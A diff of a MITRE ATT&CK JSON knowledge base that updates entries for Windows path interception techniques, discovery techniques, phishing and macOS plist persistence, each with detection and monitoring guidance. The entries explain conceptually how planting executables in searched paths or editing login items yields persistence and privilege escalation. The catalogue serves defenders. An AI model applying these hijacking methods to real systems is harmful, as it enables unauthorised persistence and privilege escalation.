- "description": "**This technique has been deprecated. Please use [Path Interception by PATH Environment Variable](https://attack.mitre.org/techniques/T1574/007), [Path Interception by Search Order Hijacking](https://attack.mitre.org/techniques/T1574/008), and [Path Interception by Unquoted Path](https://attack.mitre.org/techniques/T1574/009).**\n\nPath interception occurs when an executable is placed in a specific path so that it is executed by an application instead of the intended target. One example of this was the use of a copy of [cmd](https://attack.mitre.org/software/S0106) in the current working directory of a vulnerable application that loads a CMD or BAT file with the CreateProcess function. (Citation: TechNet MS14-019)\n\nThere are multiple distinct weaknesses or misconfigurations that adversaries may take advantage of when performing path interception: unquoted paths, path environment variable misconfigurations, and search order hijacking. The first vulnerability deals with full program paths, while the second and third occur when program paths are not specified. These techniques can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.\n\n### Unquoted Paths\nService paths (stored in Windows Registry keys) (Citation: Microsoft Subkey) and shortcut paths are vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\\unsafe path with space\\program.exe vs. \"C:\\safe path with space\\program.exe\"). (Citation: Baggett 2012) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\\program files\\myapp.exe, an adversary may create a program at C:\\program.exe that will be run instead of the intended program. 
(Citation: SecurityBoulevard Unquoted Services APR 2018) (Citation: SploitSpren Windows Priv Jan 2018)\n\n### PATH Environment Variable Misconfiguration\nThe PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\\system32 (e.g., C:\\Windows\\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.\n\nFor example, if C:\\example path precedes C:\\Windows\\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\\example path will be called instead of the Windows system \"net\" when \"net\" is executed from the command-line.\n\n### Search Order Hijacking\nSearch order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. The search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Hill NT Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.\n\nFor example, \"example.exe\" runs \"cmd.exe\" with the command-line argument net user. 
An adversary may place a program called \"net.exe\" within the same directory as example.exe, \"net.exe\" will be run instead of the Windows system utility net. In addition, if an adversary places a program called \"net.com\" in the same directory as \"net.exe\", then cmd.exe /C net user will execute \"net.com\" instead of \"net.exe\" due to the order of executable extensions defined under PATHEXT. (Citation: MSDN Environment Property)\n\nSearch order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038).",
+ "description": "**This technique has been deprecated. Please use [Path Interception by PATH Environment Variable](https://attack.mitre.org/techniques/T1574/007), [Path Interception by Search Order Hijacking](https://attack.mitre.org/techniques/T1574/008), and/or [Path Interception by Unquoted Path](https://attack.mitre.org/techniques/T1574/009).**\n\nPath interception occurs when an executable is placed in a specific path so that it is executed by an application instead of the intended target. One example of this was the use of a copy of [cmd](https://attack.mitre.org/software/S0106) in the current working directory of a vulnerable application that loads a CMD or BAT file with the CreateProcess function. (Citation: TechNet MS14-019)\n\nThere are multiple distinct weaknesses or misconfigurations that adversaries may take advantage of when performing path interception: unquoted paths, path environment variable misconfigurations, and search order hijacking. The first vulnerability deals with full program paths, while the second and third occur when program paths are not specified. These techniques can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.\n\n### Unquoted Paths\nService paths (stored in Windows Registry keys) (Citation: Microsoft Subkey) and shortcut paths are vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\\unsafe path with space\\program.exe vs. \"C:\\safe path with space\\program.exe\"). (Citation: Baggett 2012) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\\program files\\myapp.exe, an adversary may create a program at C:\\program.exe that will be run instead of the intended program. 
(Citation: SecurityBoulevard Unquoted Services APR 2018) (Citation: SploitSpren Windows Priv Jan 2018)\n\n### PATH Environment Variable Misconfiguration\nThe PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\\system32 (e.g., C:\\Windows\\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.\n\nFor example, if C:\\example path precedes C:\\Windows\\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\\example path will be called instead of the Windows system \"net\" when \"net\" is executed from the command-line.\n\n### Search Order Hijacking\nSearch order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. The search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Hill NT Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.\n\nFor example, \"example.exe\" runs \"cmd.exe\" with the command-line argument net user. 
An adversary may place a program called \"net.exe\" within the same directory as example.exe, \"net.exe\" will be run instead of the Windows system utility net. In addition, if an adversary places a program called \"net.com\" in the same directory as \"net.exe\", then cmd.exe /C net user will execute \"net.com\" instead of \"net.exe\" due to the order of executable extensions defined under PATHEXT. (Citation: MSDN Environment Property)\n\nSearch order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038).",
"external_references": [
{
"source_name": "mitre-attack",
@@ -18924,34 +19587,41 @@
"phase_name": "privilege-escalation"
}
],
- "modified": "2020-03-30T13:45:24.192Z",
+ "modified": "2020-07-06T18:49:35.645Z",
"created": "2017-05-31T21:30:36.140Z",
- "x_mitre_deprecated": true,
- "x_mitre_version": "1.0",
- "x_mitre_data_sources": [
- "File monitoring",
- "Process monitoring"
- ],
- "x_mitre_contributors": [
- "Stefan Kanthak"
- ],
- "x_mitre_detection": "Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as \"findstr,\" \"net,\" and \"python\"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious. \n\nData and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
- "x_mitre_effective_permissions": [
- "User",
- "Administrator",
- "SYSTEM"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows"
],
"x_mitre_permissions_required": [
"User",
"Administrator",
"SYSTEM"
],
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_effective_permissions": [
+ "User",
+ "Administrator",
+ "SYSTEM"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_detection": "Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as \"findstr,\" \"net,\" and \"python\"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious. \n\nData and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
+ "x_mitre_contributors": [
+ "Stefan Kanthak"
+ ],
+ "x_mitre_data_sources": [
+ "File monitoring",
+ "Process monitoring"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_deprecated": true
},
{
+ "id": "attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32",
+ "description": "Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line.\n\nThe PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\\system32 (e.g., C:\\Windows\\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.\n\nFor example, if C:\\example path precedes C:\\Windows\\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\\example path will be called instead of the Windows system \"net\" when \"net\" is executed from the command-line.",
+ "name": "Path Interception by PATH Environment Variable",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -18964,13 +19634,6 @@
"url": "https://capec.mitre.org/data/definitions/capec.html"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Path Interception by PATH Environment Variable",
- "description": "Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line.\n\nThe PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\\system32 (e.g., C:\\Windows\\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.\n\nFor example, if C:\\example path precedes C:\\Windows\\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\\example path will be called instead of the Windows system \"net\" when \"net\" is executed from the command-line.",
- "id": "attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32",
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -18986,7 +19649,7 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-26T19:59:42.456Z",
+ "modified": "2020-06-20T22:02:40.983Z",
"created": "2020-03-13T14:10:43.424Z",
"x_mitre_platforms": [
"Windows"
@@ -19002,10 +19665,34 @@
"x_mitre_is_subtechnique": true,
"x_mitre_version": "1.0",
"x_mitre_defense_bypassed": [
- "Process whitelisting"
+ "Application control"
]
},
{
+ "created": "2020-03-13T17:48:58.999Z",
+ "modified": "2020-03-26T20:03:27.496Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "persistence"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "privilege-escalation"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2",
+ "description": "Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.\n\nSearch order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.\n\nFor example, \"example.exe\" runs \"cmd.exe\" with the command-line argument net user. An adversary may place a program called \"net.exe\" within the same directory as example.exe, \"net.exe\" will be run instead of the Windows system utility net. In addition, if an adversary places a program called \"net.com\" in the same directory as \"net.exe\", then cmd.exe /C net user will execute \"net.com\" instead of \"net.exe\" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)\n\nSearch order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).",
+ "name": "Path Interception by Search Order Hijacking",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -19038,30 +19725,6 @@
"description": "Microsoft. (2011, October 24). Environment Property. Retrieved July 27, 2016."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Path Interception by Search Order Hijacking",
- "description": "Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.\n\nSearch order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.\n\nFor example, \"example.exe\" runs \"cmd.exe\" with the command-line argument net user. An adversary may place a program called \"net.exe\" within the same directory as example.exe, \"net.exe\" will be run instead of the Windows system utility net. In addition, if an adversary places a program called \"net.com\" in the same directory as \"net.exe\", then cmd.exe /C net user will execute \"net.com\" instead of \"net.exe\" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)\n\nSearch order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).",
- "id": "attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "persistence"
- },
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "privilege-escalation"
- },
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "defense-evasion"
- }
- ],
- "modified": "2020-03-26T20:03:27.496Z",
- "created": "2020-03-13T17:48:58.999Z",
"x_mitre_platforms": [
"Windows"
],
@@ -19087,13 +19750,23 @@
"x_mitre_version": "1.0"
},
{
- "id": "attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b",
- "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n\nService paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\\unsafe path with space\\program.exe vs. \"C:\\safe path with space\\program.exe\"). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\\program files\\myapp.exe, an adversary may create a program at C:\\program.exe that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)\n\nThis technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.",
- "name": "Path Interception by Unquoted Path",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ "created": "2020-03-13T13:51:58.519Z",
+ "modified": "2020-03-26T19:55:39.867Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "persistence"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "privilege-escalation"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
],
+ "type": "attack-pattern",
"external_references": [
{
"source_name": "mitre-attack",
@@ -19126,23 +19799,13 @@
"description": "absolomb. (2018, January 26). Windows Privilege Escalation Guide. Retrieved August 10, 2018."
}
],
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "persistence"
- },
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "privilege-escalation"
- },
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "defense-evasion"
- }
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "modified": "2020-03-26T19:55:39.867Z",
- "created": "2020-03-13T13:51:58.519Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Path Interception by Unquoted Path",
+ "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n\nService paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\\unsafe path with space\\program.exe vs. \"C:\\safe path with space\\program.exe\"). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\\program files\\myapp.exe, an adversary may create a program at C:\\program.exe that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)\n\nThis technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.",
+ "id": "attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b",
"x_mitre_version": "1.0",
"x_mitre_is_subtechnique": true,
"x_mitre_detection": "Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as \"findstr,\" \"net,\" and \"python\"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.\n\nData and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
@@ -19158,6 +19821,15 @@
]
},
{
+ "created": "2017-05-31T21:31:28.471Z",
+ "modified": "2020-03-26T17:42:03.337Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "discovery"
+ }
+ ],
+ "type": "attack-pattern",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -19177,38 +19849,39 @@
"name": "Peripheral Device Discovery",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"id": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "discovery"
- }
+ "x_mitre_version": "1.2",
+ "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator",
+ "SYSTEM"
+ ],
+ "x_mitre_platforms": [
+ "Windows",
+ "macOS"
],
- "modified": "2020-03-26T17:42:03.337Z",
- "created": "2017-05-31T21:31:28.471Z",
- "x_mitre_is_subtechnique": false,
"x_mitre_data_sources": [
"PowerShell logs",
"API monitoring",
"Process monitoring",
"Process command-line parameters"
],
- "x_mitre_platforms": [
- "Windows",
- "macOS"
- ],
- "x_mitre_permissions_required": [
- "User",
- "Administrator",
- "SYSTEM"
- ],
- "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
- "x_mitre_version": "1.2"
+ "x_mitre_is_subtechnique": false
},
{
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ "created": "2017-05-31T21:30:55.471Z",
+ "modified": "2020-03-26T17:48:28.002Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "discovery"
+ }
],
+ "type": "attack-pattern",
+ "id": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Permission Groups Discovery",
+ "description": "Adversaries may attempt to find group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.",
"external_references": [
{
"source_name": "mitre-attack",
@@ -19221,19 +19894,9 @@
"url": "https://capec.mitre.org/data/definitions/576.html"
}
],
- "description": "Adversaries may attempt to find group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.",
- "name": "Permission Groups Discovery",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "id": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "discovery"
- }
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "modified": "2020-03-26T17:48:28.002Z",
- "created": "2017-05-31T21:30:55.471Z",
"x_mitre_is_subtechnique": false,
"x_mitre_contributors": [
"Microsoft Threat Intelligence Center (MSTIC)"
@@ -19291,16 +19954,6 @@
],
"modified": "2020-03-28T00:04:46.427Z",
"created": "2020-03-02T18:45:07.892Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows",
- "SaaS",
- "Office 365"
- ],
- "x_mitre_detection": "Network intrusion detection systems and email gateways can be used to detect phishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.\n\nURL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.\n\nBecause most common third-party services used for phishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware.\n\nAnti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Many possible detections of follow-on behavior may take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.",
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "1.0",
"x_mitre_data_sources": [
"File monitoring",
"Packet capture",
@@ -19311,6 +19964,16 @@
"Detonation chamber",
"SSL/TLS inspection",
"Anti-virus"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_detection": "Network intrusion detection systems and email gateways can be used to detect phishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.\n\nURL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.\n\nBecause most common third-party services used for phishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware.\n\nAnti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Many possible detections of follow-on behavior may take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.",
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows",
+ "SaaS",
+ "Office 365"
]
},
{
@@ -19334,6 +19997,19 @@
"created": "2017-12-14T16:46:06.044Z"
},
{
+ "created": "2020-01-24T20:02:59.149Z",
+ "modified": "2020-06-20T19:57:36.136Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "persistence"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "privilege-escalation"
+ }
+ ],
+ "type": "attack-pattern",
"id": "attack-pattern--6747daa2-3533-4e78-8fb8-446ebb86448a",
"description": "Adversaries may modify plist files to run a program during system boot or user login. Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UTF-8 encoded and formatted like XML documents via a series of keys surrounded by < >. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as /Library/Preferences (which execute with elevated privileges) and ~/Library/Preferences (which execute with a user's privileges). \n\nAdversaries can modify plist files to execute their code as part of establishing persistence. plists may also be used to elevate privileges since they may execute in the context of another user.(Citation: Sofacy Komplex Trojan) \n\nA specific plist used for execution at login is com.apple.loginitems.plist.(Citation: Methods of Mac Malware Persistence) Applications under this plist run under the logged in user's context, and will be started every time the user logs in. Login items installed using the Service Management Framework are not visible in the System Preferences and can only be removed by the application that created them.(Citation: Adding Login Items) Users have direct control over login items installed using a shared file list which are also visible in System Preferences (Citation: Adding Login Items). Some of these applications can open visible dialogs to the user, but they don\u2019t all have to since there is an option to \"hide\" the window. If an adversary can register their own login item or modified an existing one, then they can use it to execute their code for a persistence mechanism each time the user logs in (Citation: Malware Persistence on OS X) (Citation: OSX.Dok Malware). 
The API method SMLoginItemSetEnabled can be used to set Login Items, but scripting languages like [AppleScript](https://attack.mitre.org/techniques/T1059/002) can do this as well. (Citation: Adding Login Items)",
"name": "Plist Modification",
@@ -19373,32 +20049,91 @@
"source_name": "OSX.Dok Malware"
}
],
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "persistence"
- },
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "privilege-escalation"
- }
+ "x_mitre_platforms": [
+ "macOS"
],
- "modified": "2020-03-25T19:47:38.978Z",
- "created": "2020-01-24T20:02:59.149Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_permissions_required": [
- "User",
- "Administrator"
- ],
- "x_mitre_detection": "File system monitoring can determine if plist files are being modified. Users should not have permission to modify these in most cases. Some software tools like \"Knock Knock\" can detect persistence mechanisms and point to the specific files that are being referenced. This can be helpful to see what is actually being executed.\n\nAll the login items created via shared file lists are viewable by going to the Apple menu -> System Preferences -> Users & Groups -> Login items. This area (and the corresponding file locations) should be monitored and whitelisted for known good applications. Otherwise, Login Items are located in Contents/Library/LoginItems within an application bundle, so these paths should be monitored as well.(Citation: Adding Login Items)\n\nMonitor process execution for abnormal process execution resulting from modified plist files. Monitor utilities used to modify plist files or that take a plist file as an argument, which may indicate suspicious activity.",
"x_mitre_data_sources": [
"File monitoring",
"Process monitoring",
"Process command-line parameters"
],
+ "x_mitre_detection": "File system monitoring can determine if plist files are being modified. Users should not have permission to modify these in most cases. Some software tools like \"Knock Knock\" can detect persistence mechanisms and point to the specific files that are being referenced. This can be helpful to see what is actually being executed.\n\nAll the login items created via shared file lists are viewable by going to the Apple menu -> System Preferences -> Users & Groups -> Login items. This area (and the corresponding file locations) should be monitored and allowed for known good applications. Otherwise, Login Items are located in Contents/Library/LoginItems within an application bundle, so these paths should be monitored as well.(Citation: Adding Login Items)\n\nMonitor process execution for abnormal process execution resulting from modified plist files. Monitor utilities used to modify plist files or that take a plist file as an argument, which may indicate suspicious activity.",
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
+ },
+ {
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "T1556.003",
+ "url": "https://attack.mitre.org/techniques/T1556/003"
+ },
+ {
+ "source_name": "Apple PAM",
+ "url": "https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt",
+ "description": "Apple. (2011, May 11). PAM - Pluggable Authentication Modules. Retrieved June 25, 2020."
+ },
+ {
+ "source_name": "Man Pam_Unix",
+ "url": "https://linux.die.net/man/8/pam_unix",
+ "description": "die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June 25, 2020."
+ },
+ {
+ "source_name": "Red Hat PAM",
+ "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules",
+ "description": "Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES (PAM). Retrieved June 25, 2020."
+ },
+ {
